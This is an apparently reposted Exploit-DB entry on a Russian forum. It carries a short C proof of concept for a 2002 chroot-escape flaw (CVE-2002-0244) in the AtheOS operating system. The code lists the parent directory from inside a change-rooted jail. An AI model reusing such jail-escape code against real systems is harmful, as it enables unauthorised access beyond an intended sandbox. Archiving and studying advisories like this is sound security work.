Exploit AtheOS 0.3.7 - Change Root Directory Escaping

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21282
Проверка EDB
  1. Пройдено
Автор
JEDI/SECTOR
Тип уязвимости
LOCAL
Платформа
ATHEOS
CVE
cve-2002-0244
Дата публикации
2002-02-07
C:
/*
source: https://www.securityfocus.com/bid/4051/info

AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project.

It is possible to escape change rooted directories on AtheOS. Due to insufficient handling of relative pathes, a process in the change rooted directory may change directory using the dot-dot-slash (../) specifier. This would allow access to the system with the privileges of the change rooted process. 
*/

#include <stdio.h>
#include <unistd.h>
#include <dirent.h>

int main(void)
{
    register DIR *d;
    register const struct dirent *e;

    if (chdir("/") || chroot("/tmp") || chdir("/") ||
        (d = opendir("..")) == NULL) {
        return 1;
    }
    while ((e = readdir(d)) != NULL) {
        puts(e->d_name);
    }
    return 0;
}
 
Источник
www.exploit-db.com

Похожие темы